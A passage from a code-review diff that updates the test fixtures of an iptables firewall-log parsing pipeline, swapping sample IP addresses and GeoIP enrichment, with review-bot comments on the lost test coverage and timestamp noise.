-<6>2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0
-2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0
-Jan 8 03:37:09 DENY: IN=eth0 OUT= MAC=90:10:28:5f:62:24:90:10:18:5a:89:2a:08:00 SRC=192.0.2.71 DST=192.0.2.83 LEN=88 TOS=0x00 PREC=0x00 TTL=118 ID=21684 PROTO=ICMP TYPE=3 CODE=3 [SRC=192.0.2.83 DST=192.168.173.191 LEN=60 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=UDP SPT=21458 DPT=62936 LEN=40 ]
-Jan 8 03:37:09 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=203.0.113.36 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=15743 DF PROTO=TCP SPT=17805 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0
-Jan 8 03:37:57 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=198.51.100.198 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=243 ID=17703 PROTO=TCP SPT=47091 DPT=1433 WINDOW=1024 RES=0x00 SYN URGP=0
-Jan 8 03:38:45 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=203.0.113.201 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=19619 DF PROTO=TCP SPT=59319 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0
-Jan 8 03:39:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=203.0.113.246 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=240 ID=4255 DF PROTO=TCP SPT=44181 DPT=80 WINDOW=14600 RES=0x00 SYN URGP=0
-Jan 8 03:40:21 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=203.0.113.208 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=110 ID=27150 DF PROTO=TCP SPT=64358 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0
-Jan 8 03:40:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=198.51.100.160 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=242 ID=7264 PROTO=TCP SPT=58830 DPT=445 WINDOW=1024 RES=0x00 SYN URGP=0
-Jan 8 03:41:17 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=198.51.100.115 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=117 ID=6101 DF PROTO=TCP SPT=51985 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0
-Jan 8 03:41:23 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=198.51.100.167 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=45 ID=6319 DF PROTO=TCP SPT=4099 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0
-Jan 8 03:43:18 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=198.51.100.19 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=48624 PROTO=TCP SPT=59287 DPT=139 WINDOW=1024 RES=0x00 SYN URGP=0
-Jan 8 03:43:42 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00:45:00:00:00:00 SRC=198.51.100.68 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=250 ID=54321 PROTO=TCP SPT=53296 DPT=8088 WINDOW=65535 RES=0x00 SYN URGP=0
-Jan 22 09:05:05 ubuntu-bionic kernel: [16571.459614] IN= OUT=lo SRC=2001:0db8:0000:0000:0000:0000:0000:0001 DST=2001:0db8:0000:0000:0000:0000:0000:0002 LEN=104 TC=0 HOPLIMIT=64 FLOWLBL=868225 PROTO=ICMPv6 TYPE=128 CODE=0 ID=3427 SEQ=1
+<161>Oct 10 07:25:12 Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0
+<6>2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0
+2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0
+Jan 8 03:37:09 DENY: IN=eth0 OUT= MAC=90:10:28:5f:62:24:90:10:18:5a:89:2a:08:00 SRC=192.168.2.71 DST=192.168.2.83 LEN=88 TOS=0x00 PREC=0x00 TTL=118 ID=21684 PROTO=ICMP TYPE=3 CODE=3 [SRC=192.168.2.83 DST=192.168.173.191 LEN=60 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=UDP SPT=21458 DPT=62936 LEN=40 ]
+Jan 8 03:37:09 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=15743 DF PROTO=TCP SPT=17805 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0
+Jan 8 03:37:57 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.198 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=243 ID=17703 PROTO=TCP SPT=47091 DPT=1433 WINDOW=1024 RES=0x00 SYN URGP=0
+Jan 8 03:38:45 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=19619 DF PROTO=TCP SPT=59319 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0
+Jan 8 03:39:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=240 ID=4255 DF PROTO=TCP SPT=44181 DPT=80 WINDOW=14600 RES=0x00 SYN URGP=0
+Jan 8 03:40:21 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=110 ID=27150 DF PROTO=TCP SPT=64358 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0
+Jan 8 03:40:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=192.168.100.160 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=242 ID=7264 PROTO=TCP SPT=58830 DPT=445 WINDOW=1024 RES=0x00 SYN URGP=0
+Jan 8 03:41:17 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.115 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=117 ID=6101 DF PROTO=TCP SPT=51985 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0
+Jan 8 03:41:23 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.167 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=45 ID=6319 DF PROTO=TCP SPT=4099 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0
+Jan 8 03:43:18 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=192.168.100.19 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=48624 PROTO=TCP SPT=59287 DPT=139 WINDOW=1024 RES=0x00 SYN URGP=0
+Jan 8 03:43:42 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00:45:00:00:00:00 SRC=192.168.100.68 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=250 ID=54321 PROTO=TCP SPT=53296 DPT=8088 WINDOW=65535 RES=0x00 SYN URGP=0
+Jan 22 09:05:05 ubuntu-bionic kernel: [16571.459614] IN= OUT=lo SRC=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 DST=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 LEN=104 TC=0 HOPLIMIT=64 FLOWLBL=868225 PROTO=ICMPv6 TYPE=128 CODE=0 ID=3427 SEQ=1
 Jan 22 10:52:34 ubuntu-bionic kernel: [ 307.757925] IN= OUT=enp0s3 MAC=90:10:12:34:56:78:90:10:aa:bb:cc:dd:86:dd:ff:ff SRC=fe80:0000:0000:0000:0084:88ff:feae:790a DST=ff02:0000:0000:0000:0000:0000:0000:0016 LEN=96 TC=0 HOPLIMIT=1 FLOWLBL=0 PROTO=ICMPv6 TYPE=143 CODE=0 MARK=0xd4
-Jan 5 20:17:05 MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=255.55.174.225 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520
-Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.0.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0
-Jan 5 20:17:01 MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0
-Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0
-Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0
\ No newline at end of file
+Jan 5 20:17:05 MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=81.2.69.143 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520
+Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.168.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0
+Jan 5 20:17:01 MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0
+Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0
+Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0
\ No newline at end of file
diff --git a/packages/iptables/data_stream/log/_dev/test/pipeline/test-iptables-raw.log-expected.json b/packages/iptables/data_stream/log/_dev/test/pipeline/test-iptables-raw.log-expected.json
index cf2c0fbe842..0e53091d6e7 100644
--- a/packages/iptables/data_stream/log/_dev/test/pipeline/test-iptables-raw.log-expected.json
+++ b/packages/iptables/data_stream/log/_dev/test/pipeline/test-iptables-raw.log-expected.json
@@ -42,32 +42,17 @@ "id": "default" }, "source": { - "geo": { - "continent_name": "Europe", - "country_name": "Spain", - "location": { - "lon": -3.684, - "lat": 40.4172 - }, - "country_iso_code": "ES" - }, - "as": { - "number": 13041, - "organization": { - "name": "Consorci de Serveis Universitaris de Catalunya" - } - }, "port": 38842, "mac": "90:10:65:29:b6:2a", - "ip": "158.109.0.1" + "ip": "67.43.156.15" }, - "message": "Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", + "message": "Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:RGJPRWtru8Lg2itNyFREDvoRkNA=", + "community_id": "1:jc/7ajWLmm0xdpLA7mOyvas9TyE=", "transport": "tcp" }, "observer": { @@ -85,14 +70,14 @@ }, "related": { "ip": [ - "158.109.0.1", + "67.43.156.15", "10.4.0.5" ] }, "event": { "action": "drop", - "ingested": "2021-06-15T20:04:36.725458094Z", - "original": "\u003c161\u003eOct 10 07:25:12 Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", + "ingested": "2021-12-09T13:39:42.195706800Z", + "original": "\u003c161\u003eOct 10 07:25:12 Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", "type": [ "denied", "connection" 
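Review bot: The source block of the first event loses its `geo` and `as` enrichment when 158.109.0.1 becomes 67.43.156.15, while the events switched to 81.2.69.143 (L8369, L8372, L8374, L8376) gain a full enrichment block; if "supported subset" means addresses the test GeoIP database resolves, 67.43.156.15 appears to fall outside it, and the first three events (this hunk, L8366, L8367) no longer cover the `source.geo` path at all. Either confirm that an unresolved public source is the intended case for the `wan-lan-default-D` events, or pick a resolvable address from the same set so enrichment stays covered there. Separately, every event's `event.ingested` is rewritten (here through L8388), which is regeneration noise unrelated to the address change; if the pipeline test runner can exclude dynamic fields, excluding `event.ingested` would keep future fixture diffs to substantive changes.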
@@ -145,32 +130,17 @@ "id": "default" }, "source": { - "geo": { - "continent_name": "Europe", - "country_name": "Spain", - "location": { - "lon": -3.684, - "lat": 40.4172 - }, - "country_iso_code": "ES" - }, - "as": { - "number": 13041, - "organization": { - "name": "Consorci de Serveis Universitaris de Catalunya" - } - }, "port": 38842, "mac": "90:10:65:29:b6:2a", - "ip": "158.109.0.1" + "ip": "67.43.156.15" }, - "message": "Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", + "message": "Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:RGJPRWtru8Lg2itNyFREDvoRkNA=", + "community_id": "1:jc/7ajWLmm0xdpLA7mOyvas9TyE=", "transport": "tcp" }, "observer": { @@ -188,14 +158,14 @@ }, "related": { "ip": [ - "158.109.0.1", + "67.43.156.15", "10.4.0.5" ] }, "event": { "action": "drop", - "ingested": "2021-06-15T20:04:36.725463865Z", - "original": "\u003c6\u003e2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", + "ingested": "2021-12-09T13:39:42.195716800Z", + "original": "\u003c6\u003e2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", "type": [ "denied", "connection" 
@@ -243,32 +213,17 @@ "id": "default" }, "source": { - "geo": { - "continent_name": "Europe", - "country_name": "Spain", - "location": { - "lon": -3.684, - "lat": 40.4172 - }, - "country_iso_code": "ES" - }, - "as": { - "number": 13041, - "organization": { - "name": "Consorci de Serveis Universitaris de Catalunya" - } - }, "port": 38842, "mac": "90:10:65:29:b6:2a", - "ip": "158.109.0.1" + "ip": "67.43.156.15" }, - "message": "Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", + "message": "Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:RGJPRWtru8Lg2itNyFREDvoRkNA=", + "community_id": "1:jc/7ajWLmm0xdpLA7mOyvas9TyE=", "transport": "tcp" }, "observer": { @@ -286,14 +241,14 @@ }, "related": { "ip": [ - "158.109.0.1", + "67.43.156.15", "10.4.0.5" ] }, "event": { "action": "drop", - "ingested": "2021-06-15T20:04:36.725466725Z", - "original": "2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", + "ingested": "2021-12-09T13:39:42.195726300Z", + "original": "2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0", "type": [ "denied", "connection" 
@@ -321,19 +276,19 @@ }, "destination": { "mac": "90:10:28:5f:62:24", - "ip": "192.0.2.83" + "ip": "192.168.2.83" }, "source": { "mac": "90:10:18:5a:89:2a", - "ip": "192.0.2.71" + "ip": "192.168.2.71" }, - "message": "DENY: IN=eth0 OUT= MAC=90:10:28:5f:62:24:90:10:18:5a:89:2a:08:00 SRC=192.0.2.71 DST=192.0.2.83 LEN=88 TOS=0x00 PREC=0x00 TTL=118 ID=21684 PROTO=ICMP TYPE=3 CODE=3 [SRC=192.0.2.83 DST=192.168.173.191 LEN=60 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=UDP SPT=21458 DPT=62936 LEN=40 ]", + "message": "DENY: IN=eth0 OUT= MAC=90:10:28:5f:62:24:90:10:18:5a:89:2a:08:00 SRC=192.168.2.71 DST=192.168.2.83 LEN=88 TOS=0x00 PREC=0x00 TTL=118 ID=21684 PROTO=ICMP TYPE=3 CODE=3 [SRC=192.168.2.83 DST=192.168.173.191 LEN=60 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=UDP SPT=21458 DPT=62936 LEN=40 ]", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:T79jBEYlbFhpnIGt2rOuzIv31hE=", + "community_id": "1:v5jWdgB//QU/ZfG9vivofYLpWjA=", "transport": "icmp" }, "@timestamp": "2021-01-08T03:37:09.000Z", @@ -342,14 +297,14 @@ }, "related": { "ip": [ - "192.0.2.71", - "192.0.2.83" + "192.168.2.71", + "192.168.2.83" ] }, "event": { "action": "deny", - "ingested": "2021-06-15T20:04:36.725469433Z", - "original": "Jan 8 03:37:09 DENY: IN=eth0 OUT= MAC=90:10:28:5f:62:24:90:10:18:5a:89:2a:08:00 SRC=192.0.2.71 DST=192.0.2.83 LEN=88 TOS=0x00 PREC=0x00 TTL=118 ID=21684 PROTO=ICMP TYPE=3 CODE=3 [SRC=192.0.2.83 DST=192.168.173.191 LEN=60 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=UDP SPT=21458 DPT=62936 LEN=40 ]", + "ingested": "2021-12-09T13:39:42.195732600Z", + "original": "Jan 8 03:37:09 DENY: IN=eth0 OUT= MAC=90:10:28:5f:62:24:90:10:18:5a:89:2a:08:00 SRC=192.168.2.71 DST=192.168.2.83 LEN=88 TOS=0x00 PREC=0x00 TTL=118 ID=21684 PROTO=ICMP TYPE=3 CODE=3 [SRC=192.168.2.83 DST=192.168.173.191 LEN=60 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=UDP SPT=21458 DPT=62936 LEN=40 ]", "type": [ "denied", "connection" 
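Review bot: The ICMP DENY event's source and destination move from the RFC 5737 documentation range (192.0.2.71, 192.0.2.83) into RFC 1918 space (192.168.2.71, 192.168.2.83), and the same substitution is applied to the `WAN_OUT`/`source-dest` destinations at L8385–L8388 and to the `DROP_INPUT` sources at L8370 and L8377–L8382 (198.51.100.x → 192.168.100.x). That changes what the fixture describes: events named as WAN egress or as inbound scans on 445/1433/139 now have private endpoints on both sides, so any future public-versus-private handling in this pipeline would be exercised only by the 81.2.69.143 and 67.43.156.15 events. If the address validator accepts the documentation ranges, keeping them would preserve that distinction; if it does not, that constraint is worth a sentence in the PR description so the next regeneration does not reintroduce them.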
@@ -387,17 +342,35 @@ "ip": "172.16.54.114" }, "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", + "location": { + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } + }, "port": 17805, "mac": "90:10:9e:ec:2c:71", - "ip": "203.0.113.36" + "ip": "81.2.69.143" }, - "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=203.0.113.36 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=15743 DF PROTO=TCP SPT=17805 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", + "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=15743 DF PROTO=TCP SPT=17805 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:VD3aeZ6cGYX6uwOAUQ9NuxbobMI=", + "community_id": "1:mS1rlKt+I+dWD1dNPcASrH/J3Iw=", "transport": "tcp" }, "observer": { 
@@ -409,14 +382,14 @@ }, "related": { "ip": [ - "203.0.113.36", + "81.2.69.143", "172.16.54.114" ] }, "event": { "action": "drop_input", - "ingested": "2021-06-15T20:04:36.725472111Z", - "original": "Jan 8 03:37:09 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=203.0.113.36 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=15743 DF PROTO=TCP SPT=17805 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", + "ingested": "2021-12-09T13:39:42.195737Z", + "original": "Jan 8 03:37:09 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=15743 DF PROTO=TCP SPT=17805 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "type": [ "denied", "connection" @@ -453,15 +426,15 @@ "source": { "port": 47091, "mac": "90:10:76:e0:e2:d5", - "ip": "198.51.100.198" + "ip": "192.168.100.198" }, - "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=198.51.100.198 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=243 ID=17703 PROTO=TCP SPT=47091 DPT=1433 WINDOW=1024 RES=0x00 SYN URGP=0 ", + "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.198 DST=172.16.54.114 LEN=40 